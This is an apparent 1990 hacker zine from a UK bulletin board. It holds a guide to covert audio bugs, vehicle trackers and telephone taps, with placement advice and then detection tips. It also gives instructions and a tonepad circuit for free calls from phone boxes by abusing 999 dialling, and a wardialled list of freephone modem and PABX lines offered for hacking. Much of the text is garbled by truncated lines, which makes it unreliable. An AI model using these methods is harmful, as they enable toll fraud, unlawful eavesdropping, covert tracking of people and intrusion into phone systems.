small transmitter with a microphone. The devices can be combined to perform as a reciever and a microphone ( used in mind reading acts ). They are broadly split into two types - those which power them selves and those which draw power from some source. Bear inmind the size also has to include the antenna which can be several inches long. There is a problem of signal drift which can be overcome with a crystal control - but this requires more power. If they are not diguised they can be a dead give away ( they reciver doesn`t need to be disguised as the bugs can be tuned to operate on FM (VHF) or AM so just listen in your radio or car radio), to get around this several novel methods of disguise have been used. Martini Olive Bug This is designed to look like an olive on a cocktail stick, the transmitter is the olive and the antenna the stick. Range about fifty feet and can functio happily at the bottom of the glass. Sugar-Cube Bug This has two audio frequency circuits and three radio frequency circuits. Sealed in a protective silicon shell designed to resemble a sugar cube. Can transmit while at the bottom of a cup of coffee. Pen Bug Ball point or fountain pen and switched on by twisting the barrel or removing the cap and placing on the other end and they write. Calulator Bug Transmitter is built into a popular calculator which will function normally and can draw power from the calculator battery. Plug Bug Looks like a standard 13 amp plug but has a transmitter whihc has own battery or can draw power from mains. Also can use earth wire as antenna. Adaptor Bug. Works like an ordinary plug but transmitter built in , can use mains power. Light Switch Bug Built into the back of a rocker type light switch and draws power from mains supply - two models available - one which is on all the time and one which transmits only when the light is on. A problem with all these bugs is the limited battery life, there are several methods of extending battery life. Vox activated - these have a preset level at which they will switch on and a delay when they stop (so they dont stop whi there is a gap in a sentance) but because of the switch the bug is bigger. Another method is to incorporate a timer circuit and this will turn the bug on and off when set ( digital watch technology) can be set 9-5 when people are in offices. A more expensive way is to use a radio controlled bug, a coded signal is sent to activate the bug and then it switches off after two minutes. Very expensive though. HOMERS These are radio transmitters used to track someone, it is simply a transmitter which sends high powered pulses and a reciever picks them up as a series of beeps, the transmitter is usually the size of a cigarette packet and has a sho rigid aerial sticking out and a couple of powerful magnets to hold it onto the car. The receivers depend on what you can afford, simplest is one with no direction capabitlity and relies on volume - the closer you get the louder it gets. Then there are those which indicate direction , this can be a vertically mounted loop aerial or a pair of aerials on on each side of the vehicle. When you pick up the sound turn until it is loudest then you are in the same plane as the homer then you can gauge how far away by the speed of the beeps ( the faster the closer) this plane can be behind you as well as in front though. Some extra features are range control - you switch as you get closer e.g 1st settings beeps until a continuous tone then within 6 miles, then 2nd setti this goes into a continuous tone within one mile etc. Another feature can be t null switch , if the target is directly in front or behind you there is no sou if the target moves left or right you will get a tone ( different for left and right). Doppler shift recievers will tell you in which direction the target i moving but its expensive. Homing people can be done by incorporating the homer into a card ( business or credit, make sure its think or coloured so the electronics can`t be seen) but you canot have a battery so it relies on the radiation given out by Tv sets an radio`s and other electrical appliances and converts them into a series of bee They are only suitable for close work. Laser Bug This is rather like a contact mike as it relies on the vibrations produced by sound on the window, it reflects light waves and when they hit the window they will be modulated slightly. Feed a pulsed power supply to a laser and direct t beam at the window and some of this light will be reflected back, use a good astronomical telescope to focus the light and then it passes through a pinhole and onto a photomultiplier tube. The tube and its electronics detects variatio in pulse width and translates them back into sound. Infra red can be used, but you will have to use an ordinary light source to target it. Another way is to use cd lasers to pick up conversations and transmit them to a receiver miles away but you will have to line it up VERY accurately. It is also hard to detec or stumble across accidently. Infra Red Transmitter This can transmit up to 500 metres and is similar to a radio bug, the bug must be by a window though and a special reciever is needed ( maybe in a camer Telephone Tapping Tapping telephones can be done several ways and each relies on different equipment. Inductive Tap Induction microphones are very cheap and be bought anywhere , they are a couple of inches long and about half an inch across (cylindrical), it has two wires coming out of one end and a sucker on teh other end. The wiring can go t a tape recorded or an amplifier, obviu\ously this can`t be used but there are mics which are disguised as pads or other desk objects, in most cases a minatu amplifier is needed. Another type fits over the phone line and alos houses a transmitter also it doesn`t cut into the cable although the sound is weak. Alos note that they can be detected if a radio transmitter is built in and the can pick up humming from electrical devices. Radio Tap These are transmitting bugs specifically designed for use with phones. The mos common device in the ... Drop in Mike This is so called as in america the microphone just had to be unscrewed and th new transmitter dropped in. It draws its power from the phone and needs no maintenance. It acts like a normal microphone and transmits all conversations. Series an Parallel The obvious difference between these is the way in which theuy are connected t the phone line, the parallel is connected over both lines whereas the series is connected over one, they can both incorporate a small transmitter. The Parallel bug can be line or battery powered, but you can get the best of both worlds by having them trickle charged - it draws minute quantities and is difficult to detect via a meter. Battery powered versions are said to have a better range and they operate all the time so could lead to detection. No wires have to be cut to install this bug. The series bug is more common and cheaper, it can be batery or line powered b will only transmit when the phone is in use - this makes detection difficult. The line powered versions are smaller , about an inch square and half an inch think - hiding it in a phone or junction box is easy. Third Wire Bug These bugs are connected in paralleland normally line powered although a rechargable battery version is available. Average size is around 1 and half inches by half an inch, it operates like a prallel bug but when not in use switches to its own internal microphone and transmits souns from the room, this is reputedly favourite amongst USA law enforcement agencies. Infinity Transmitter These are around the size of a third wire bug and are the most exotic type of bug. They cannot monitor telephone conversations but the device is line powered and can be connected anywhere along the phone line ( or inside the phone) the person calls the target and then sends a tone down the line which activates the Bug. The tone is matched to a reciving unit in the bug and thus they are also known as Harmonica bugs. The bug cancels the bell of the victim's phone and uses an internal mic or the phones mic to send the room conversation down the line - note that these cannot be used wher ther is a switchboard due to the direct dialling technique. There are several variaitons of this bug - One device waits for the eavesdropper to dail and then expects a tone immediately this cancels the bell so it doesn't even ring. However the bell could ring and alert the victim. Another device waits for the victim to answer and then says he has a wrong number, when the victim hangs up the device is activated. Another device automatically cuts out the handset if the phone is lifted so operates normally, some cut off after a certain amount of time, some incorporate an led so that installation is easy as the light will b on if installed correctly. They don't need batteries or further attention once installed. They are very difficult to detect and even the phone company can miss it if its off. Hookswitch Defeat This is the switch the handset is dropped onto, by defeating this the micropho will still be activated and you can listen in. The defeat can be done by a resistor connected across the switch - an amplifier would be needed on the listeners side as the volume level will be low. The method is to call up say that you have a wrong number and then don't hang up when he does, then listen Although this can work for anyone else too so some are remote controlled. (ton or radio activated). They are hard to detect and cheap, ( can`t detect as its only one component). Drop Out Relay These are widely available and are just electronic switches which switch on whenever the phone is in use. Some have their own batteries or line powered and can activate taperecorders etc. by the raly - just clip on and put the other lead in the tape recorder. They are easy to install and can be used legitimately. Lost Transmitters This is a bug which is designed to blend in with the electrical components - they are wired into the circuit board and transmit whenever it is in use and will pick up sounds from the room. These are very expensive if one is foun this means you are dealing with some very nasty people. Direct Tap All you need is a pair of high impedence head phones and connected to the line via crocodile clips with a capacitor in between to keep out the phone companie electricity. There are many disadvantages as it is very easy to spot and when installing and produce clicking noises on the line. A higher voltage will pass through the lines or terminals and this can be detected by a meter or bulb, th headphones can be replaced by a tranformer and then to a tape recorder. Excellent Quality. Ok so there are the bugs now how the F**K do you find them! BUGGING - Guidelines Stick to these if possible, use own judgement in special situations. Situation Device Used Remarks Rural Rifle,MIC. Bulky, difficult to conceal, Location Parabolic mic. need little background noise and good weather. Urban Small Directional Difficult to operate in Location MIC. crowded streets. Background noise a problem. Vehicle Radio bug, Am- FM Power a problem unless VHF, connected to car power. Can pick up interference fro vehicle electrics, effecienc will fluctuate as receiver will have to follow close behind. Tape Recorder Normally lots of space in ca ( dash, under seat ), but ne change tapes. Quality and reliability excellent. Restaurants etc. Concealed directional Easy to use, good quality, Mike. Get close to target. Table b wall - less background noise use less against noisy room. Offices/Rooms Tape Recorder Difficult to conceal and nee with access. regular access - excellent quality. Wired Mic. Range limited to length of w can be time consuming to install - may lead to detect no further attention after installation. Quality very good. Radio Bug Battery type have a limited life but more flexible in installation. 100 yard range quality can be very poor. use VOX ( voice activate) to reduce detection. Hookswitch Defeat Open telephone MIC. room conservation carried down li Resistor, capacitor or diode can be used.Can be missed by physical search. Works Well. Office/Room Without access Contact Mic. Easy and quick, install on window, door, or wall. Good results depends on thickness of wall ( sounding board ). Difficult to detect. Tube Mic. Can be pushed through cracks wall, through keyholes, unde doors, in back to back socke installation canbe noisy (drill holes), work well. Very difficult to detect. Spike Mic. Noisy and difficult to insta but can work well. Difficult detect. But can be detected metal detector. Infinity Transmitter Fitted easily along phone li carries conversation anywher works, good quality and hard to detect. Laser Bug Safest way, but expensive. Telephone Tapping Type Remarks Direct Tap Simple to install, especially at terminal box, Headphones can be used, or drop out relay and recorde Very good quality. Inductive Tap No connections needed, easy to install but has to be close to phone, needs wiring to transmitter - can be easy to detect. Quality is poor. Series or Parallel Can be connected anywhere along the line or concealed Tap in phone or junction box. Transmits phone conversatio to receiver, poor quality ( as in radio bug) but can power from line or battery. Third Wire Bug As above but transmits romm conversation when phone n in use. Lost transmitter Made to blend in with background of electronics components - expensive, dificult to fit but equally difficult to detect. Drop in Bug Simple to install and some difficult to detect by physical search. Needs no attention and is reliable. Detecting 1. Physical search - start outside the house and walk slowly around it and examine eveything carefully, look for any wires going int Outside House the walls and make sure you know what they are for and follow them back to the pole etc. look for wires spliced into the cable, particularly in the top of the pole. Ther may be an inspection hatch if the cables go under ground so try and lift and inspect it. If in a large building look in the terminal box for any wires across terminals i anything suspicious is found then call the company. While walking outside examine the windows ( frames as well) loo for signs of disturbance. Inside House Examine ALL furniture, check backs and drawers, wardrobes etc. Look under beds - under the fabric underneath, look for holes, bedrooms are favourite. Standard bugs have a w trailing from them, and a battery on the outside. Don`t forget all the disguised bugs and any household ornaments remnove green felt or feel underneath for holes.Ask where all objects came from, look at all pictures and frames ma sure they haven`t been tampered with . Examine walls, ceilings and floors, also curtains and pelmets, roll back carpets and examine floorboards. Anything suspicious then take up the floor boards and have a look. Look for any suspicious wires tucked under the edges of carpets. Alway examine ceilings from above if possible, especially in bedrooms, wear overalls. If only from below have a look at flaking paint in walls and ceiling and look for mis- matched areas of paint. Examine any holes but check for electrical wires etc. first. Houses and apartments with party walls have problems, the best way to see these is t check for flaking paint or small holes. Don`t go round to neighbours whenn found - they aren`t going to let you in they have bugged you. You can dig away at the wall and kn the spike out. Holes for tube mikes can be blocked up wit plaster filler effectively knocking it out. Switch off th mains and look at light sockets ( unscrew ), and look for any extra components. With the power unscrew the ceiling roses and take a look inside, also any other light fittings. The telephone Pickup the handset and unscrew, examine the telephone thoroughly, small bkack cubes with wires are trouble, che the hookswitch action, make sure it shuts off the mic, examine all wires thoroughly and see where they go, check to see if any are thinnner or thicker and if they use pro terminals or not. Put phone back together and check junct box, look at terminals and check telegraph pole and the junction box at the top. 2. Electrical First use metal detector,check walls, celings, floors any pipes will run in a straight line , helpful to know where the pipes etc. run Check any ornaments with the detector shake ornaments and check weight, look at base for holes covered with filler. If no equipment use VHF radio and turn control to see if any screech happens, put next to phone if screech then th line bug, make a call and test again , check junction box same way, Use tv with indoor aerial, make a loud noise an turn tv down and tune tv - if a bug then horizontal lines appear which wil jump to the music - nearer the bug large the jump, - this will pick up the bug ( if VHF) from a distance away , send the sound source to several adjoinin rooms to detect bugs further away. If found carry on onto rest of bandwidth, get someone to make a call and check again. examine terminal box - voltage between terminals should be 46-50v if lower may be a bug in parallel, infin drop till under 10, lift handset measure voltage 2-12v. i higher then something connected in series (series bug). Open phone and check microphone terminals - hold down hoo switch and if voltage across mic then hookswitch defeat e Check volts across terminal while sending tones down line Examine car, underneath for homers, look at woring for splicing and under dash, feedback search, Deterrence Paint a thin stripe of nail varnish across gaps, tighten screws then undo by a quarter or 3/4 then make a note of where the slots and the screws are. Apply to junction box too. Check all people coming in and restrict entry - watc at all times. If to toilet go to bedroom and find summit do. If bug found hold a bait meeting to lure eaves droppe If not return to bug and drain bettery so has to replace. if bug reconnect wire several times while making a call, series jiggle the hookswitch and then cut off bug. Training Use labur force, Carbon ribbons just dumped in bin wherea documents shredded. Short hand pads left in drawer docume locked away. People wander around freely - ask who - if be careful of security etc. car phone a big risk and portable or freeway wireless ones. use phones far away fr hotels etc. use different tables at restaurants etc. lase bug prevent heavy curtains blinds etc. and clean windows ( dirty ones reflect more) - itemised phone bills, cellul radio - big brother - easy to detect, satellite, Detecting Bugs This can be quite cheap and easy. Field Strength Meter This is bascially a crystal radio set connected to a meter instead of a speake It shows the power output of any transmitter in the vicinity and is sold as an aid to ham radio operators. The sensitivity is low so detection should not be further than 12 inches away from the bug. If it does detect something the need will swing across so the furthest swing will be closest to the meter. A proble can be that they will react to a passing polics car or a commercial radio station. If one is bought with a receiver circuit then it is tunable so you ca tune into the frequency of the bug. Also an amplifier can aid detection. Feed Back Detector When a transmitter gets to close to a receiver then feedback is produced ( if at the same frequency). This type of detector relies on feedback and is couple to an amplifier and a receiver circuit. When using these you will need a noise for the bug to transmit ( singing etc.) ,Then you simply scan through the frequencies and if there is a bug transmitting you will get a squeal as the detector hits the same frequency. The Feedback detector generally has a further range but can tip off an eavesdropper because of the noise. Telephone Analyser This is expensive equipment which will carry out a series of tests on a phone line semi automatically. These are particularly useful when dealing with complicated phone set ups like a switchboard. Tracing an individual pair of wires without one of these can be tedious. The tests actually carried out vary from machine to machine, they usually come in attache cases and are battery powered. The first test will be to measure th voltage across a phone line when the phone is on and off the hook. If the volt is lower than it should be it may be a bug. If the voltage at the mic is too h then it could be a bug. There is no difference between this and an ordinary vo meter. The next test is a tone sweep, the analyser sweeps through the spectrum and then if anything which reacts to a tone is on the line it will reduce the voltage on the line and the analyser will detect this, stop and give you a warning. The next test is high voltage pulsing a charge is built up then fired down the line, some hookswitch defeats use a change of voltage to trigger them, if a hook switch is activated the analyser will pick up the voltage of the microphone and the alarm will go off. Another test is audio listening, the operator will listen to the line and an acoustic generator is switched on. If the operator hears a tone down the line then some osrt of hookswitch defeat is in operation, this method can also dete infinity transmitters as any noise will be transmitted down the line which the operator will hear. Each individual wire is tested against each other to see i the sound from the generator is being transmitted down the phone line. (n.b. tone has to be around voice frequency). Any good analyser wil test al these any may even test for conductive paint on casing being used. Spectrum Analyser This sweeps entire frequency bands in the same way as a field strength meter searches for radiation. A typical sophisticated Spectrum Analyser can sweep between 20 kilohertz and 2000 megahertz. Some can do this all in one go or in separate plug in modules. It should carry out the scan automatically and when it detects a transmission it will stop and display the frequency, and the strength of the signal on a field strength meter and let you listen to the transmission on an internal speaker. Some analysers have a cathode ray tube as an oscilloscope to display the waveform and even buy another CRT which show the frequency versus amplitude of demodulated components of the primary signal such as subcarriers, and a second frequency indicator for the subcarrier. You can pick up a spectrum analyser which detects RF radiation including singl sideband, pulse width transmissions and those with the carrier wave removed, o a very wide band coverage. Cable Checkers This is just a portable metal detector to see where mysterious wiring is going they can be bought anywhere. Also a screamer is available which will detect whther there is a microphone on either end and the MIC will emit a loud noise and so can be located. Also you can use an inductive mic and an amplifier to check to see if anything is on the line. Detectors can be built using a field strength meter and replacing it with a led, some have a sensitivity control. Another way to detect a bug is to install a telephone watchdog which detects the resistance or capacitance of the line, if anybody cuts in or installs a bu the devices led will go on - this will only respond to change so any bug on already wil not be detected. Scramblers - simple scramblers are available, but so are descrambler`s. The more expensive scramblers alter the frequency and parts of speech around 650 to 750 times a second. These can virtually defeat any attempt to descramble, except of course the american security agency. Jammers - these are simply wide band transmitters which transmit white noise. these will also jam tv`s radios etc....Another jammer uses two high frequency transmitters and will cause any microphone to squeal at the difference between the two. Another magnetically induces an intense noise in the handset micropho which will block any infinity or hookswitch defeats. Any contact mics can be jammed by buzzers or vibrators stuck to the window or sounding board. THE detector - all bugs use at least one semi conductor, if an ultra high freqency carrier wave is emmited it will be radiated back by the bug. This radiation will contain strong harmonic components - ( a harmonic is a componen where the frequency is an exact numerical multiple of the fundamental or strongest frequency. This strongest frequency is the first harmonic, twice the frequency is the second harmonic and so on.). Other objects will only radiate back to the second harmonic and only a semi-conductor junction will produce a third harmonic. A small UHF transmitter and a reciver tuned to the third harmonic is all that is needed ( use like a field strength meter), the radiati emitted back will be minute so teh detector will be expensive and have to be v close to the bug. --------------------- Palm Beach BBS - +44(303)-265979 ----------------------- ---------------------------------------------------------------------------- | | | ELEKTRIX Issue 1 - Part 4 | | ~~~~~~~~~~~~~~~~~~~~~~~~~ | | | | Make your own Tonepad for Phone Box phreaking | | by Maxhack | | | | PALM BEACH BB UK ++44(303)-265979 | | | ---------------------------------------------------------------------------- The Technique Some weeks ago free dialling with tonepads came to the news in a daily newspaper. Since then there has been much in the way of media hype covering these devices in computer magazines and hackers files. This file will, I hope,make the whole practise clear and the method easy and also less costly than previously. The way it works is as follows: The technique will ONLY work from phone boxes contrary to what you may have been told. You may also find that it is not working on some London phone boxes - this is due to the fact that many have been modified to disallow phreakers from using the method. The technique relies on the fact that dialling 999 on a phone box auto- matically disconnects the charging mechanism whilst the call is being made. The tonepads which allow people to make free calls are just portable models of the tone-dialling telephone circuits that are in your telephones and in modern modems. The tones they generate are perfectly 'legal' and are simply used in portable units for Computerdial services (Share price indexes,etc.) for travelling businessmen and other groups who may use such services (like voice mail or whatever). All you do is the following: [1] Go to a phone box. [2] Dial the number you wish to connect to using the keypad. [3] As soon as the phone starts ringing dial 999 on the phonebox machine as fast as possible. This will have cut the charging mechanism and you will have a free call. * For boxes that have been modified......Simply put 10p in first then do * * it - you won't loose your money but you will still make a free call. * * This has to be done since they are modified so that they won't dial a * * number (except 999/linkline 0800/government) unless money has been dep * * osited in the machine. Method 1 -------- You can record the tones required to dial a number onto a tape and then play them down the telephone with a standard taperecorder. This has three main drawbacks however although it is the least costly method. 1) You will need to record a different set of tones for each number. So un- less you dial a few numbers repeatedly then you are going to find this method very tiresome. You'll need to have a DTMF modem/phone too. 2) The phone system requires that each tone is within 1.5% of the specified frequencies. This will prove to be difficult if you don't own very good recording equipment. 3) You will look very conspicuous playing around with a tape recorder in a phone box. Despite the disadvantages it has to be remembered that this method is the cheapest option open to you. Method 2 -------- This involves building your own portable tonepad (unless you want to fork out œ12-50 for a Tandy one). The device is small, effective and relatively cheap. One method is as follows: [Battery] _______ +9V --------|6 |----<14-----123 | |----<13-----456 Numeric Keypad lines | |----<12-----789 --------|16 |----<11-----*0# [Speaker] S | |----<3------'|| --------|1 |----<4-------'| | | | |----<5--------' | --|15 7|--- | | | X [3.579545 MHz Crystal] | | 8|--- | ------- GND TCM5087 (-Ve on battery) That way is simple to build since few components are needed...get a keypad off an old remote controller or something...or make your own from Push-to- make switches. Other methods include using two 555s to generate the tones or two 8037s (wave form gen. chips) though this is a little too expensive for my liking and only needs more complex circuitry. If you intend to use 555s then you'll need a monostable on each 555 and the frequencies used are as follows: * - 941 & 1209 Hz # - 941 & 1477 Hz 0 - 941 & 1336 Hz 1 - 697 & 1209 Hz 2 - 697 & 1336 Hz 3 - 697 & 1477 Hz 4 - 770 & 1209 Hz 5 - 770 & 1306 Hz 6 - 770 & 1477 Hz 7 - 852 & 1209 Hz 8 - 852 & 1336 Hz 9 - 852 & 1477 Hz -------------------- Palm Beach BBS ++44(303)-265979 ----------------------- ---------------------------------------------------------------------------- | | | ELEKTRIX Issue 1 - Part 5 | | ~~~~~~~~~~~~~~~~~~~~~~~~~ | | | | Freefone interrogation - the ultimate listing | | by Agent 7 | | | | PALM BEACH BB UK ++44(303)-265979 | | | ---------------------------------------------------------------------------- I have undertaken a massive dial through of LINKLINE (0800) numbers to be listed in this and forthcoming issues of ELEKTRIX. All were known to be in working order when this first issue went out - May 1990. Some you may have seen before - others you won't. I've simply collected all the known ones I could find which were still working and listed useful information for each. Since there seems to be much going on with Voice mailboxes, computerdial, test lines, and PABX hacking lately I have included these too with comments where appropriate as well as the standard modem lines. Since on occasions a great many numbers 'side by side' have been engaged at the same time I have included this since it may give clues to the nature of the line-use should you wish to pursue these. The ranges that I have dialled through myself have not always been in a logical fashion - but then it gets real boring dialling through 1000 dead numbers. So I try to vary it. But the results have been reasonable. If you have made any dials through 0800 or just modem wardials then please let us have the results so we can share them with others - it's also pointless two people dialling through the same ranges. I hope these lists bring you much fun! Regards Pop Key: node = (xxx---) number = (---xxx) Node info: 321 - This seems to be a test area for BT's latest projects (voicedial, computerdial, intelligent fax services etc.) node number results notes ---- ------ ------- ----- 321 100 computerdial Announced as 'Remote Update', it requires 3 digit service codes. 101-109 no service 110 digital recording 'This service is no longer avail- able'. 111 digital recording 'Goodbye'. 112 digital recording 'Goodbye'. 113 digital recording 'Please press start on your fax + fax response machine'. 114-115 computerdial British Telecom Weather Centre. + optional fax With voice + fax forecasts. 116 digital recording 'Goodbye'. 117 digital recording 'This is 0800 briefing'. + fax response 118 computerdial Puzzleline test service. + optional fax 119 computerdial BTRL estate agency test service. 120 PABX computerdial In the form xxx. 580 - 0800 Brief Response#1 'That number is not listed.' Response#2 'That number was not specified correctly.' 121-123 fax response 124-126 PABX computerdial 127-129 fax response 130-139 rings and rings 140-141 No service 142 Engaged 143 No service 144 Engaged 145-146 No service 147 rings and rings 148-149 No service 150-179 Engaged 180-199 rings and rings 282 443 MODEM 2400 Does nothing 809 Weird Autoanswers then nothing 861 MODEM 1200/75 871 MODEM 1200 8/N/1 Does nothing 289 237 STRANGE TONES 384 Voice recording '45-55' - Weird 485 MODEM 1200/75 643 MODEM 2400 The old US dialout 783 MODEM 1200/75 817 MODEM 1200 7/E/1 Comes up with '+++ ? ERROR' CTRL-E gives '28301 DMLDN G' Enter SYS - gives '+++ STF GO' 456 100 Computerdial BT Service centre computerdial sys 521 509 MODEM 2400 Weird prompt 585 111 MODEM 1200/75 Cambridge PSS port - not connected 891 002 PABX Resource line DTMF then * code 004 AT&T CARD PABX Calling card service 831 MODEM 2400 Yale Direct login 898 058 PABX Uptodate list to be included in each ELEKTRIX issue..... -------------------- Palm Beach BBS ++44(303)-265979 -----------------------